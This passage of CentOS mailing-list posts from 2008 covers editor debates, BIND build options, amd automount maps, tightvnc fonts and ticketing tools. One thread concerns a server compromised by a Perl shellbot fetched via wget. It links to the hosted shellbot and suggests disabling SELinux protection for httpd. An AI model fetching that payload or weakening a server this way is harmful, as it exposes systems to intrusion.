sync, try again, fail sync, try again). Fortunately it didn't just drop 
/dev/sdb and I was able to reverse the process to get everything back 
onto /dev/sda, replaced /dev/sdb with a different drive and tried again. 
The second time worked without any hitches. How I didn't loose any data 
is beyond me ... sometimes it is better to be lucky than good.


Other than to make sure your drives are good the procedure described in 
the links of this thread work very nicely.


--
Paul ([EMAIL PROTECTED])

___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Missing fonts for tightvnc

[Robert Moskowitz]

Ignacio Vazquez-Abrams wrote:

On Tue, 2008-08-12 at 14:53 -0400, Robert Moskowitz wrote:
  
You would think installing via yum would handle dependencies, but 
perhaps fonts are not managed like dependencies.



Well, they can be, but not unless the packager does so.

The challenge now is what to install to get them.


___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Please help: The process of am-utils map key lookup

[Bill Campbell]

On Tue, Aug 12, 2008, Robinson Tiemuqinke wrote:
>Hi,

>I am using am-utils(amd binary daemon) to auto mount home directories. the
>mounting process seems working fine but I am still not understand how the
>amd map key(s) lookup process works.

>I've carefully read the am-utils(amd) document at http://am-
>utils.org/docs/am-utils/am-utils_8.html, especially the chapter "3.2 How
>keys are looked up" but am still not clear. For example, I'd like to access
>/home/dumbboy/files/deleteme, what is the key to be used, and how the
>lookup/match happens? and how the mount operations happens? Thanks a lot.

My amd.homes is considerably simpler than that.  We automount to
/homes/username using something like this where the machine
alexis has the real home directories.

# amd.homes
/defaults   opts:=nodevs,soft,rw,type:=nfs;proto=tcp,

*   host==alexis;type:=link;fs:=/home/${key} \
host!=alexis;type:=nfs;rhost:=alexis;rfs:=/home/${key}

Bill
-- 
INTERNET:   [EMAIL PROTECTED]  Bill Campbell; Celestial Software LLC
URL: http://www.celestial.com/  PO Box 820; 6641 E. Mercer Way
Voice:  (206) 236-1676  Mercer Island, WA 98040-0820
Fax:(206) 232-9186

The Income Tax has made more Liars out of American people than Golf has.
Will Rogers
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] bind-9.3.4-6.0.2.P1.el5_2 and rrset-order: order 'fixed'not fully implemented

[Johnny Hughes]

Scott McClanahan wrote:

According to this page, BIND can be compiled with the "enabled-fixed-rrset" option to 
support this.  How to determine what switches were used to compile the BIND RPM I downloaded with 
"yum update?"


I was recently curious about this too.  Is there an easier way than
peering into the spec file?  Thanks



No, that is the only way I know.

The build log when we made it said:

./configure --build=i686-redhat-linux-gnu --host=i686-redhat-linux-gnu 
--target=i386-redhat-linux-gnu --program-prefix= --prefix=/usr 
--exec-prefix=/usr --bindir=/usr/bin --sbindir=/usr/sbin 
--sysconfdir=/etc --datadir=/usr/share --includedir=/usr/include 
--libdir=/usr/lib --libexecdir=/usr/libexec --localstatedir=/var 
--sharedstatedir=/usr/com --mandir=/usr/share/man 
--infodir=/usr/share/info --with-libtool --localstatedir=/var 
--enable-threads --enable-ipv6 --with-pic --with-openssl=/usr 
--enable-libbind 'CFLAGS=-O2 -g -pipe -Wall -Wp,-D_FORTIFY_SOURCE=2 
-fexceptions -fstack-protector --param=ssp-buffer-size=4 -m32 
-march=i386 -mtune=generic -fasynchronous-unwind-tables 
-I/usr/kerberos/include


This is also in the log for "/lib/bind":

running /bin/sh './configure' --prefix=/usr 
'--build=i686-redhat-linux-gnu' '--host=i686-redhat-linux-gnu' 
'--target=i386-redhat-linux-gnu' '--program-prefix=' '--prefix=/usr' 
'--exec-prefix=/usr' '--bindir=/usr/bin' '--sbindir=/usr/sbin' 
'--sysconfdir=/etc' '--datadir=/usr/share' '--includedir=/usr/include' 
'--libdir=/usr/lib' '--libexecdir=/usr/libexec' 
'--sharedstatedir=/usr/com' '--mandir=/usr/share/man' 
'--infodir=/usr/share/info' '--with-libtool' '--localstatedir=/var' 
'--enable-threads' '--enable-ipv6' '--with-pic' '--with-openssl=/usr' 
'--enable-libbind' 'CFLAGS=-O2 -g -pipe -Wall -Wp,-D_FORTIFY_SOURCE=2 
-fexceptions -fstack-protector --param=ssp-buffer-size=4 -m32 
-march=i386 -mtune=generic -fasynchronous-unwind-tables 
-I/usr/kerberos/include ' 'CPPFLAGS= -I/usr/kerberos/include ' 
'CXXFLAGS=-O2 -g -pipe -Wall -Wp,-D_FORTIFY_SOURCE=2 -fexceptions 
-fstack-protector --param=ssp-buffer-size=4 -m32 -march=i386 
-mtune=generic -fasynchronous-unwind-tables' 'FFLAGS=-O2 -g -pipe -Wall 
-Wp,-D_FORTIFY_SOURCE=2 -fexceptions -fstack-protector 
--param=ssp-buffer-size=4 -m32 -march=i386 -mtune=generic 
-fasynchronous-unwind-tables' 'LDFLAGS= -L/usr/kerberos/lib ' 
'build_alias=i686-redhat-linux-gnu' 'host_alias=i686-redhat-linux-gnu' 
'target_alias=i386-redhat-linux-gnu' --cache-file=/dev/null --srcdir=.


But remember, we do not pick these switches, we build them like they are 
in RHEL.






signature.asc
Description: OpenPGP digital signature
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Re: gcc editor for newbie (Emacs or vim or ?)

[Nifty Cluster Mitch]

On Mon, Aug 11, 2008 at 07:20:22PM -0500, Lanny Marcus wrote:
>On Mon, Aug 11, 2008 at 1:30 PM, Scott Silva <[EMAIL PROTECTED]> wrote:
>> on 8-11-2008 9:06 AM Lanny Marcus spake the following:
>
>>> I will look at Eclipse, but one of my goals is to be able to fix
>problems
>>> on
>>> a remote box and that will probably require vi.
>>
>> Then you shouldn't go wrong, because I have yet to be on a linux box
>or a
>> bsd box that didn't have some form or emulation of vi installed.
>vi is everywhere! But, apparently, I need to learn how to use Emacs or
>another IDE too, so there's another learning curve.

A good IDE can help you manage and organize a local project.

Stick with vi/vim/gvim and "make" for a while.

Next add a revision control system (RCS) and patch to your tool kit.

Some class material takes advantage of a specific IDE to 
manage the various bits in a class.   In a 'good' class 
they begin with small components.  Then they begin to reuse
those components and build larger projects.  If you are
working through such a tutorial -- go with the flow and 
use what ever tool set they do.

Eclipse is nice in that it can run both on Linux and Windows
For a Java class it is a natural...

Does anyone out there use Eclipse or another IDE with a distributed revision 
control system
like, git, mecurial, cvs, bitkeeper, etc...?


-- 
T o m  M i t c h e l l 
Got a great hat... now what.

___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Suggestion on Network Management software with troubleticket system

[Meenoo Shivdasani]

> In my current small-ish setting, I use Trac for tickets and documentation. I
> keep most configuration files in a Subversion repository (an export of which
> serves as the depot for cfengine) -- and Trac makes it easy to link between
> wiki pages, tickets, and repository revisions.

I second the recommendation for Trac + Subversion for ticketing,
documentation, + revision history.

> I don't think this setup would scale to a large organization, but it works
> just fine in smaller environments.

For a large organization that needs a full-blown ticketing system, RT
is applicable, but it's really cumbersome to set up if you just need a
fairly small system.

> Nagios, like cfengine, takes a while to get started, but does the job once
> it's up and running. Wolfgang Barth's book from No Starch Press can be handy
> to have around if you want an accessible introduction and reference.

And, for monitoring, I second the vote for Nagios -- very customizable.

M
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Suggestion on Network Management software with troubleticket system

[Lodewijk christoffel]

Nifty Cluster Mitch wrote:

On Tue, Aug 12, 2008 at 07:52:45AM +0700, Fajar Priyanto wrote:
  

Subject: [CentOS] Suggestion on Network Management software with
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hi all,
I'm looking for a network management software. And as the network grows
it clearly becomes that manual notes is getting too tedious. Also an
integrated troube ticketing systemm would be great.
Any reference is really appreciated.





  


Kayako system is what you need...

___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Suggestion on Network Management software with troubleticket system

[Nifty Cluster Mitch]

On Tue, Aug 12, 2008 at 07:52:45AM +0700, Fajar Priyanto wrote:
> Subject: [CentOS] Suggestion on Network Management software with
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
> 
> Hi all,
> I'm looking for a network management software. And as the network grows
> it clearly becomes that manual notes is getting too tedious. Also an
> integrated troube ticketing systemm would be great.
> Any reference is really appreciated.

Network management is an area worth some thought.

For tracking events to closure...
Look at Bugzilla, Eventium and the other suggestions posted

I suspect you need tracking, ownership, states (new, assigned, working, OMGH, 
fixed), attached documents, the ability to generate 
reports and also solve the do you remember games when systems are down 
(documentation).

Network management is interesting If there is a problem with the
network, bug systems and other "tools" may also be off line.The classic
way to monitor a network is to live on it and have a phone, Rolodex and pager
handy to contact the other end of the wire.


-- 
T o m  M i t c h e l l 
Got a great hat... now what.

___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

[CentOS] Kerio Mailserver on Centos 5

[dnk]

I was wondering if any of the mail admins on here have used the kerio  
mail server on centos, and their thoughts on it.



My initial testing is going very well - but was hoping for some  
unbiased opinions (as opposed to asking on the kerio forum) on it's  
use with centos (5 in particular if possible). THE typical q's - IE  
performance, issues, etc.


Thanks in advance.

Dk


___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Missing fonts for tightvnc

[Ignacio Vazquez-Abrams]

On Tue, 2008-08-12 at 14:53 -0400, Robert Moskowitz wrote:
> You would think installing via yum would handle dependencies, but 
> perhaps fonts are not managed like dependencies.

Well, they can be, but not unless the packager does so.

-- 
Ignacio Vazquez-Abrams <[EMAIL PROTECTED]>

PLEASE don't CC me; I'm already subscribed


signature.asc
Description: This is a digitally signed message part
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Re: gcc editor for newbie (Emacs or vim or ?)

[Spiro Harvey, Knossos Networks Ltd]

Edlin


aarrgh my eyes...

I don't know who to credit the quote to, but I think it's best described by:

"Windows. From the company that brought you edlin."



--
Spiro Harvey  Knossos Networks Ltd
021-295-1923www.knossos.net.nz

___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] bind-9.3.4-6.0.2.P1.el5_2 and rrset-order: order 'fixed'not fully implemented

[Scott McClanahan]

> According to this page, BIND can be compiled with the "enabled-fixed-rrset" 
> option to support this.  How to determine what switches were used to compile 
> the BIND RPM I downloaded with "yum update?"

I was recently curious about this too.  Is there an easier way than
peering into the spec file?  Thanks

-scott
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Re: gcc editor for newbie (Emacs or vim or ?)

[Mihai T. Lazarescu]

On Tue, Aug 12, 2008 at 03:27:28PM -0400, William L. Maltby wrote:

> On Tue, 2008-08-12 at 20:45 +0200, Mihai T. Lazarescu wrote:
> > An intuitive interface shortens the learning curve.
> > An efficient interface becomes a concern after that. vi came
> > to serve in an environment where most were looking simply for
> > efficiency, the way they perceived it back then.  And some of
> > those rules are still effective today.
> 
> I'm afraid most of the really good rules are "broken" today. Best
> example is the original credo of UNIX: "Do one thing and do it well".
> That was the design philosophy then. Free software development
> methodology tends to subvert that. Today, "design towards mediocrity" is
> the credo, ecouraging the users and developers to be less competent,
> imaginative and requiring less thought.

I'm afraid that addressing the average needs is a widespread
trend today even outside computing.  Fortunate us that besides
the shells of all-in-one programs we can find and work with
those building blocks of the sound, original concepts.

My point was concerning Florin remark that the basic needs
for building an efficient UI had changed so much over time.

The only additional UI standard device we have today is the
mouse and we see an explosion of *G*UI.  However, almost
all modern GUI recognize the keyboard command efficiency and
provide a range of shortcuts for power users.  The best GUI
even allow for user-configurable shortcuts and macros.

Through modal operation vi pushed this one step further,
shortening the interaction with the keyboard.  A host of
frequently used commands are one key away once you get your
mind set that text entering ends with ESC.

I can agree that shortening the keyboard interaction may not
worth that much to many people.  But this does not alter the
fact that visually searching entries in menus takes a lot more
that a keyboard shortcut for the same task.  And a shortcut
made of keys plus modifiers take longer than the same or less
keys with less or no modifiers.

On Tue, Aug 12, 2008 at 12:06:35PM -0700, Florin Andrei wrote:

> Well, when people start to fail to understand your metaphors (or switch  
> to the uber-literal-minded mode and attack the imperfections in the  
> comparisons you make, instead of debating the original topic), you know  
> it's pointless to continue the discussion. ;-)

It's up to you to see the points addressing the original topic
within the replies.

> But the way this "discussion" evolved is a great illustration for why vi  
> still survives today. If it was a rational decision, it would have died  
> circa 1999.

You may also fail to see why the development of mutt started
about that time, borrowing "obsoleties" from both vi and mail.
I'm afraid this does not make mutt a less rational decision or
less usefull program, nor make of its or vim young and quite
active developers nostalgics blind to progress. :)

> Alright, time for me to disappear from this thread.

Mihai
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] learning centos

[Nifty Cluster Mitch]

On Tue, Aug 12, 2008 at 05:41:17AM -0700, Akemi Yagi wrote:
> On Tue, Aug 12, 2008 at 5:11 AM, pedro henrique antunes de oliveira
> <[EMAIL PROTECTED]> wrote:
> > Hello, I'm new to CENTOS and I'd like to learn how to use it from ground up.
> >
> > Can anyone recommend me books on it?
> >
> > I already have the documentation from the web site, can I start with it?
> >
> > I've already done very basic stuff on archlinux and slackware.
> 
> Take a look at #4 of
> http://www.centos.org/modules/newbb/viewtopic.php?topic_id=14273&forum=47
> (for example)

And do recall that CentOS draws from Redhat.
There are many 'books' about RedHat -- from the ground up.



-- 
T o m  M i t c h e l l 
Got a great hat... now what.

___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] mystery process "unit"

[Ned Slider]

sbeam wrote:


Maybe enabling selinux but leaving httpd opened up would be appropriate for 
the time being. Is that possible or advisable? audit2allow wants to allow a 
lot of things.




Try toggling the httpd_disable_trans boolean:

setsebool -P httpd_disable_trans on

That should disable SELinux protection of the httpd daemon.

Presumably that is preferable to running in permissive mode or disabling 
SELinux.



___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

[CentOS] Please help: The process of am-utils map key lookup

[Robinson Tiemuqinke]

Hi,

 I am using am-utils(amd binary daemon) to auto mount home directories. the 
mounting process seems working fine but I am still not understand how the amd 
map key(s) lookup process works. 

 I've carefully read the am-utils(amd) document at 
http://am-utils.org/docs/am-utils/am-utils_8.html, especially the chapter "3.2 
How keys are looked up" but am still not clear. For example, I'd like to access 
/home/dumbboy/files/deleteme, what is the key to be used, and how the 
lookup/match happens? and how the mount operations happens? Thanks a lot.

 I've attached my configuration files below:

$ cat /etc/amd.conf
...
auto_dir =  /.amd_mnt
...
map_type =  file
search_path =   /etc
...
[ /home ]
map_name =  amd.home
...

$ cat /etc/amd.home
/defaults 
type:=nfs;sublink:=${key};opts:=rw,intr,tcp,nfsvers=3,vers=3,nosuid,nodev,noresvport,rsize=16384,wsize=16384;fs:=${autodir}/${rhost}${rfs}
dumbboy rhost:=home111;rfs:=/0/export/home
* rhost:=home110;rfs:=/0/export/home
...

Thanks.










  
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

[CentOS] Looking for remote console on iPv6 without security layer

[Robert Moskowitz]

I am looking for a remote console program that I can run over IPv6.  I 
do not need it to supply its own security layer, as I will be running it 
over HIP (http://infrahip.hiit.fi/).


I have discovered that VNCSERVER that comes with Centos does not support 
IPv6.  I would have to pay for a copy of Enterprise VNC from RealVNC for 
IPv6.


I am having strange font problems wiht tightVNC (which is claimed to 
work with IPv6).


FreeNX works with SSH, and it is not clear how to run it without SSH.  
For my purpose, I do not want to layer multiple security transports.


So recommendations???


___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] mystery process "unit"

[sbeam]

On Tuesday 12 August 2008 15:44, Jancio Wodnik wrote:
> Hm. And what about selinux and httpd ? Selinux is securing httpd from
> this attacks, right ? Selinux was disabled ?

good point, SElinux is set to permissive on this system because we had to get 
up and running in a hurry and support a lot of legacy apps that do unusual 
things. apache needs to read/write various config and include files that are 
in non-standard locations. We tried it enabled and nothing worked.

in the audit.log I am seeing where it wanted to deny the bot a tcp_socket. So 
that would have been good :/

Maybe enabling selinux but leaving httpd opened up would be appropriate for 
the time being. Is that possible or advisable? audit2allow wants to allow a 
lot of things.

___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

[CentOS] bind-9.3.4-6.0.2.P1.el5_2 and rrset-order: order 'fixed' not fully implemented

[Keith Christian]

Running CentOS 5.2 with the following BIND update rpm, installed with "yum 
update" - bind-9.3.4-6.0.2.P1.el5_2.

Our master DNS has an rrset-order stanza with "order fixed" entries similar to 
the following:

rrset-order {
class IN type A name "abc.foobar123.com" order fixed;
class IN type A name "def.foobar123.com" order fixed;
class IN type A name "ghi.foobar123.com" order fixed;
[ stuff deleted ]
}



When restarting BIND, I find LOTS of these entries in /var/log/messages:

rrset-order: order 'fixed' not fully implemented
rrset-order: order 'fixed' not fully implemented
rrset-order: order 'fixed' not fully implemented


According to this page, BIND can be compiled with the "enabled-fixed-rrset" 
option to support this.  How to determine what switches were used to compile 
the BIND RPM I downloaded with "yum update?"

>From http://www.isc.org/index.pl?/sw/bind/view/?release=9.5.0 :

2362.   [cleanup]   Make "rrset-order fixed" a compile-time option.
settable by "./configure --enable-fixed-rrset".
Disabled by default. [RT #17977]


Thanks,

=Keith


___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] mystery process "unit"

[Jancio Wodnik]

sbeam pisze:

On Tuesday 12 August 2008 09:08, Mr Shunz wrote:
  

maybe you should check with "lsof -p 3041" and see which files/pipes it
uses to have a clue.



of course! 

it's a perl w0rm that was uploaded last night, now killed. Now to determine 
how it got in.


I found some output in the main apache error log that looks like wget was used 
to download a shellbot. But I can't figure out how wget was called, may be 
some PHP exec() call that is unchecked. 


But I can't find it on the system yet or the data files it uses.

chkrootkit says all is clear.

mod_security is now being installed, belatedly. This server has only been up 1 
week, sheesh.


thanks
Sam



PS here is the link to the shellbot that was used, in case anyone is curious. 
I break up the URL to protect the innocent:


http://usuarios.lycos.es/w0rms/info.txt

have searched it and don't find anything special on the main security sites. 
Is it new?
  
Hm. And what about selinux and httpd ? Selinux is securing httpd from 
this attacks, right ? Selinux was disabled ?


Irek


___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


  


___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Re: gcc editor for newbie (Emacs or vim or ?)

[Frank Cox]

On Tue, 12 Aug 2008 15:27:28 -0400
"William L. Maltby" <[EMAIL PROTECTED]> wrote:

> Or the stupid
> MS editor that used to come on DOS?

Edlin was good for automated remote script generation over a serial connection.

(We used to do kiosks with today's weather report and the special at the
restaurant down the block (etc.) using fancy batch files and Opus (the
Fidonet-compatible BBS ) to do updates.)

-- 
MELVILLE THEATRE ~ Melville Sask ~ http://www.melvilletheatre.com
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Re: gcc editor for newbie (Emacs or vim or ?)

[William L. Maltby]

On Tue, 2008-08-12 at 20:45 +0200, Mihai T. Lazarescu wrote:
> On Tue, Aug 12, 2008 at 10:48:10AM -0700, Florin Andrei wrote:
> 
> > MHR wrote:
> >>
> >> Vi is not the world's best editor
> >
> > Heh, understatement of the century.
> > It's an awful editor. I wish I could hire the person who came up with  
> > the user interface, only to have the satisfaction of having him/her  
> > fired five minutes later. With no severance package.
> >
> > It's one of the worst designs from a usability perspective. Yes, it's on  

Note: all pejorative terms originally "penned" in this reply have been
expunged in the interests of tolerance of ignorance.

Spoken like a "youngster" who has no knowledge of the history of how we
got where we are now. Vi, based not only on the things that Mihai
mentions below, was made available when memory and CPU was *expensive*
and people who did software development were generally *competent*. The
equipment of the day (ignoring very expensive mainframes, mostly IBM)
upon which UNIX, ed, and the whole *IX foundation was developed, were
along the lines of PDP 11/34 (later 11/70) with *big* (physically) slow
(absolutely) and small (capacity) disks and little memory. CPU power was
no great shakes either. One needed utilities that were very small and
efficient. "C" was relatively new, higher-level languages were too
inefficient and assembly language was still heavily used in many
applications and wherever CPU or memory capacities were of major
concern.

Machine efficiency was paramount and "user interface" was secondary
because of the relative costs and availability of resources - mechanical
and human.

Later (above time was mid '70s), a 16MHz 286 with a 10MB "blinding fast"
60ms average seek (IIRC?) HD and 64KB (*not* a typo, it was KB) of
memory and 12" monitor (monochrome "green" screen) was advertised in the
PC Tech Journal April 1984 (IIRC?) for "only" $10,995.

I never had a problem with the "user" interface - it was a huge advance
over SPF (what we had to use on IBM mainframes on 3270 terminals), IMO.
Of course, the COBOL programmers complained incessantly when I tried to
show them vi.

Anyway, back on track. The adequacy of the user interface really depends
very heavily on the desired goals and the user competence, learning
speed, primary tasks, ... etc. When I drive my Corvette 2 miles each way
to and from work (which I don't, never did) the "solution" doesn't fit
the application. A bike is better, or walking. Any software tools can be
so evaluated. For me, ed was great. Vi was even better. Emacs held no
attraction. For *you*, none of these may be suitable. That doesn't make
vi(m) what you chose to call it.

For all the years I used it, it was fine. Integrated Development
Environments were a nice step, but I still used and preferred vi within
them.

Well, 'nuff of my old fart rant about "youngsters".

> > every Unix system out there. Yes, it's very complex and can be powerful  
> > and can be extended to do a million things. Yes, you can train yourself  
> > so you learn it well enough so that the interface is not a problem 
> > anymore.
> > But all that does not negate the basic fact that it's one of the most  
> > un-intuitive and essentially broken user interface designs ever. But  

I presume you never had to use a context editor like "ed"? Or the stupid
MS editor that used to come on DOS? If so, you could not use the terms
"one of the most un-intuitive and essentially broken...". But, again,
the time these things were developed dictated much of their design.

> > we're stuck with it, which is unfortunate.
> >
> > Note: I'm not an Emacs fan. :-)
> 
> Looking in perspective vi grew up with UNIX.  At times when
> the output device just tilted from printers to CRTs the UNIX
> savvy perceived efficiency mainly in terms of reusing the
> legacy knowledge of ed, ex, and regex as well as resources,
> execution time, and fast and reliable command and display
> time on slow machines and interfaces.  In these regards vi(m)
> simply excelled then as it does today.
> 
> An intuitive interface shortens the learning curve.
> An efficient interface becomes a concern after that. vi came
> to serve in an environment where most were looking simply for
> efficiency, the way they perceived it back then.  And some of
> those rules are still effective today.

I'm afraid most of the really good rules are "broken" today. Best
example is the original credo of UNIX: "Do one thing and do it well".
That was the design philosophy then. Free software development
methodology tends to subvert that. Today, "design towards mediocrity" is
the credo, ecouraging the users and developers to be less competent,
imaginative and requiring less thought.

> 
> Of course I use vim to write this email. :)
> 
> Cheers,
> 
> Mihai
> 

-- 
Bill

___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Re: gcc editor for newbie (Emacs or vim or ?)

[Florin Andrei]

Well, when people start to fail to understand your metaphors (or switch 
to the uber-literal-minded mode and attack the imperfections in the 
comparisons you make, instead of debating the original topic), you know 
it's pointless to continue the discussion. ;-)


But the way this "discussion" evolved is a great illustration for why vi 
still survives today. If it was a rational decision, it would have died 
circa 1999.


Alright, time for me to disappear from this thread.

--
Florin Andrei

http://florin.myip.org/
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Re: gcc editor for newbie (Emacs or vim or ?)

[Toby Bluhm]

Florin Andrei wrote:

Frank Cox wrote:

On Tue, 12 Aug 2008 10:48:10 -0700
Florin Andrei <[EMAIL PROTECTED]> wrote:

It's an awful editor. I wish I could hire the person who came up with 
the user interface, only to have the satisfaction of having him/her 
fired five minutes later. With no severance package.


Viewed in the context of the time when it was originally created, it's 
a work
of genius.  There's a reason why it became the default text editor on 
Unix

systems.


I don't deny that.
Interlaced video, at the time it was invented, was a great idea. Now 
it's a huge harassment for anyone doing video processing. The steam 
engine was a huge step forward - a few hundred years ago. And look at it 
now.





If interlaced video powered by a steam engine works for me, why should I 
change?


My car is over 10 yrs old & runs fine - don't need a new one.
My house was built 45 yrs ago & I like it - don't need a new one.
I was born over 50 yrs ago & I don't need . . . well, ok - maybe there's 
room for improvement. :-)




--
Toby Bluhm
Alltech Medical Systems America, Inc.

___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

[CentOS] Missing fonts for tightvnc

[Robert Moskowitz]

You would think installing via yum would handle dependencies, but 
perhaps fonts are not managed like dependencies.


Anyway, I installed tightvnc to test out its IPv6 support.

Installed ok (after I erased regular vnc).  But when I tried to start 
it, I got 5 warnings about:


Font directory '/usr/X11R6/lib/X11/fonts/misc' not found - ignoring 
(then the same message for Speedo, Type1, 75dpi, and 100dpi).


Then a fatel server error about: could not open default fount 'fixed'

So I looked in the repos (curtesy of yumex) and did find a few 75dpi a 
100dpi fonts, but there seemed to be a lot of these two.  I installed a 
ocuple of them and tried again.  Got the same errors.


So how do I fix this one?



___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Re: gcc editor for newbie (Emacs or vim or ?)

[Frank Cox]

On Tue, 12 Aug 2008 11:25:50 -0700
Florin Andrei <[EMAIL PROTECTED]> wrote:

> Frank Cox wrote:
> > On Tue, 12 Aug 2008 10:48:10 -0700
> > Florin Andrei <[EMAIL PROTECTED]> wrote:
> > 
> >> It's an awful editor. I wish I could hire the person who came up with 
> >> the user interface, only to have the satisfaction of having him/her 
> >> fired five minutes later. With no severance package.
> > 
> > Viewed in the context of the time when it was originally created, it's a 
> > work
> > of genius.  There's a reason why it became the default text editor on Unix
> > systems.
> 
> I don't deny that.

You did above.  Bill Joy invented vi, by the way.  You might want to read about
his accomplishments sometime.

> Interlaced video, at the time it was invented, was a great idea. Now 
> it's a huge harassment for anyone doing video processing. 

Interlaced video is very useful to "extend" the apparent bandwidth of an analog
video stream, and that's useful in many applications, both today and tomorrow.
Remember, everything doesn't revolve around the television in your living
room and the monitor on your desk.

> The steam 
> engine was a huge step forward - a few hundred years ago. And look at it 
> now.

In view of the fact that a nuclear reactor is basically a big steam engine, I
fail to see your point

-- 
MELVILLE THEATRE ~ Melville Sask ~ http://www.melvilletheatre.com
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Re: gcc editor for newbie (Emacs or vim or ?)

[Mihai T. Lazarescu]

On Tue, Aug 12, 2008 at 10:48:10AM -0700, Florin Andrei wrote:

> MHR wrote:
>>
>> Vi is not the world's best editor
>
> Heh, understatement of the century.
> It's an awful editor. I wish I could hire the person who came up with  
> the user interface, only to have the satisfaction of having him/her  
> fired five minutes later. With no severance package.
>
> It's one of the worst designs from a usability perspective. Yes, it's on  
> every Unix system out there. Yes, it's very complex and can be powerful  
> and can be extended to do a million things. Yes, you can train yourself  
> so you learn it well enough so that the interface is not a problem 
> anymore.
> But all that does not negate the basic fact that it's one of the most  
> un-intuitive and essentially broken user interface designs ever. But  
> we're stuck with it, which is unfortunate.
>
> Note: I'm not an Emacs fan. :-)

Looking in perspective vi grew up with UNIX.  At times when
the output device just tilted from printers to CRTs the UNIX
savvy perceived efficiency mainly in terms of reusing the
legacy knowledge of ed, ex, and regex as well as resources,
execution time, and fast and reliable command and display
time on slow machines and interfaces.  In these regards vi(m)
simply excelled then as it does today.

An intuitive interface shortens the learning curve.
An efficient interface becomes a concern after that. vi came
to serve in an environment where most were looking simply for
efficiency, the way they perceived it back then.  And some of
those rules are still effective today.

Of course I use vim to write this email. :)

Cheers,

Mihai
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Re: gcc editor for newbie (Emacs or vim or ?)

[Florin Andrei]

Frank Cox wrote:

On Tue, 12 Aug 2008 10:48:10 -0700
Florin Andrei <[EMAIL PROTECTED]> wrote:

It's an awful editor. I wish I could hire the person who came up with 
the user interface, only to have the satisfaction of having him/her 
fired five minutes later. With no severance package.


Viewed in the context of the time when it was originally created, it's a work
of genius.  There's a reason why it became the default text editor on Unix
systems.


I don't deny that.
Interlaced video, at the time it was invented, was a great idea. Now 
it's a huge harassment for anyone doing video processing. The steam 
engine was a huge step forward - a few hundred years ago. And look at it 
now.


--
Florin Andrei

http://florin.myip.org/
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Re: gcc editor for newbie (Emacs or vim or ?)

[Frank Cox]

On Tue, 12 Aug 2008 10:48:10 -0700
Florin Andrei <[EMAIL PROTECTED]> wrote:

> It's an awful editor. I wish I could hire the person who came up with 
> the user interface, only to have the satisfaction of having him/her 
> fired five minutes later. With no severance package.

Viewed in the context of the time when it was originally created, it's a work
of genius.  There's a reason why it became the default text editor on Unix
systems.

-- 
MELVILLE THEATRE ~ Melville Sask ~ http://www.melvilletheatre.com
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] gcc editor for newbie (Emacs or vim or ?)

[Frank Cox]

On Tue, 12 Aug 2008 13:10:25 -0400
Bowie Bailey <[EMAIL PROTECTED]> wrote:

> There is a nice vi cheatsheet available here:
> 
> http://downloads.techrepublic.com.com/abstract.aspx?docid=172404

"Access to this feature requires a free TechRepublic membership!"


-- 
MELVILLE THEATRE ~ Melville Sask ~ http://www.melvilletheatre.com
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] mystery process "unit"

[sbeam]

On Tuesday 12 August 2008 13:39, Jeff Kinz wrote:
> If you don't mind I would like to use it as a real world example for a
> class I'm teaching?  I will remove all the identifying information
> first of course.

Sure go right ahead.

Unfortunately I have tons of real world examples... :/

cheers
Sam
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

No IPv6 - Re: [CentOS] vncserver on IPv6

[Robert Moskowitz]

Triggered by your comments below about the log...

Rob Lockhart wrote:
On Mon, Aug 11, 2008 at 12:01 PM, Robert Moskowitz 
